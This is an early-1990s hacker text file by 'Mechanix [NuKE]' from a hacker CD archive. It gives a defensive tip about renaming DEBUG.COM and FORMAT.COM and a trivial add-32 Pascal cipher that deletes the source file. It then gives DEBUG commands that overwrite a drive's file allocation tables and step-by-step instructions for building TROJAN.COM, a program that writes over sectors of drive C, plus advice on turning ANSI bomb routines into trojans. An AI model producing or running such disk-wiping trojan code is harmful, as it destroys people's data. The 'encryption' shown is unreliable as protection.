home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 2 / HACKER2.BIN / 335.DATA.EXE / TEXT24.TXT < prev    next >
Text File  |  1991-10-18  |  3KB  |  120 lines

  1. ──────────────────────> Various :
  2.  
  3.     This whole section is dedicated to all kinds of little tricks I've
  4.  accumulated over a while.
  5.  
  6. ──> First of all, before this goes any further, anyone who is vulnerable to
  7.  hacking (Sysops...), do the following:
  8.  RENAME your DEBUG.COM and FORMAT.COM files to something else, or take them
  9.  out of the PATH. This gives a better protection against ANSI bombs and Batch
  10.  file trojans, that call on these files to do there work. This might seem
  11.  fairly obvious, and perhaps stupid, to some of you, but you would be surprised
  12.  at the number of people who get nailed because of this.
  13.  
  14.  
  15.  
  16. ──> Well some people have asked me how to make a program that would encrypt
  17.  text files. Well I've thought about it, and came up with a little Turbo Pascal
  18.  routine that does the job just fine.
  19.  
  20.   PROGRAM CRYPT;
  21.   VAR
  22.    f,g  : TEXT;
  23.    ch,b : CHAR;
  24.    c    : BYTE;
  25.   BEGIN
  26.   ASSIGN (f,'TEST.TXT');  { replace to ASSIGN (f,Paramstr(1)) if you want to }
  27.   ASSIGN (g,'CRYPT.TXT'); { enter the filename in the command string.        }
  28.   RESET (f); REWRITE (g);
  29.   WHILE NOT EOF(f) DO
  30.    Begin
  31.     READ (f,ch);
  32.     c := (ORD(ch) + 32);
  33.     b := CHR(c);
  34.     WRITE (g,b);
  35.    End;
  36.   CLOSE (f); CLOSE (g);
  37.   ERASE (f); { you might want to take this off if you're unsure about the file}
  38.   END.
  39.  
  40.  This will add 32 to the character value of each character in the text file,
  41.  and write it in CRYPT.TXT.
  42.  
  43.  
  44.  
  45.  
  46.  To reverse the encryption, simply compile and run the following.
  47.  
  48.   PROGRAM UNCRYPT;
  49.   VAR
  50.    f,g  : TEXT;
  51.    ch,b : CHAR;
  52.    c    : BYTE;
  53.   BEGIN
  54.   ASSIGN (f,'TEST.TXT');
  55.   ASSIGN (g,'CRYPT.TXT'); { Same comment as before }
  56.   RESET (g); REWRITE (f);
  57.   WHILE NOT EOF(g) DO
  58.    Begin
  59.     READ (g,ch);
  60.     c := (ORD(ch) - 32);
  61.     b := CHR(c);
  62.     WRITE (f,b);
  63.    End;
  64.   CLOSE (f); CLOSE (g); ERASE (g);
  65.   END.
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76. ──> Here are a few tricks using DEBUG. First off the following commands, when
  77.  entered under the Debug prompt, will rearrange the FATs on a selected drive.
  78.  Just pick one:
  79.  
  80.   WCS:100 x 1 100  where x is the drive number: A: = 0, B: = 1, C: = 2 ...
  81.   W 1 x 1 100      same as above.
  82.  
  83.  Next, you might have noticed that many ANSI bombs use Debug routines... These
  84.  Debug routines can easily be turned into Trojans. I will show you an example
  85.  using the Debug routine found in one of the .BMB files found in the RABID ANSI
  86.  Bomb Generator 2B:
  87.  
  88.  C:\> DEBUG <CR>
  89.  - A <CR>
  90.  xxxx:nnnn MOV AL,02 <CR> {replace 02 with 00 for drive A:, 01 for drive B:...}
  91.  xxxx:nnnn MOV CX,5  <CR>
  92.  xxxx:nnnn MOV DX,0  <CR>
  93.  xxxx:nnnn INT 26    <CR>
  94.  xxxx:nnnn           <CR> {copy down the nnnn number}
  95.  - N TROJAN.COM <CR>
  96.  - RBX          <CR>
  97.  BX:0000
  98.  :0      <CR>
  99.  - RCX   <CR>
  100.  CX:0000
  101.  :nnnn   <CR> {type in the nnnn number noted earlier}
  102.  - W     <CR>
  103.  WRITING nnnn BYTES
  104.  - Q     <CR>
  105.  
  106.  Just run TROJAN.COM. The preceding routine was a primitive variation of the
  107.  Corrupt Trojan v2.0 by Acid Face... I have used this under his permission.
  108.  To apply this system to other ANSI bomb routines, simply note the commands
  109.  issued by the infected file, and proceed in the same way. It might help to
  110.  have a copy of that .BMB file used earlier. Also, to see the commands issued
  111.  by the ANSI bomb, simply take DEBUG out of the PATH, or rename it, and type in
  112.  the ANSI bomb. The commands will scroll harmlessly on the screen.
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  Mechanix [NuKE]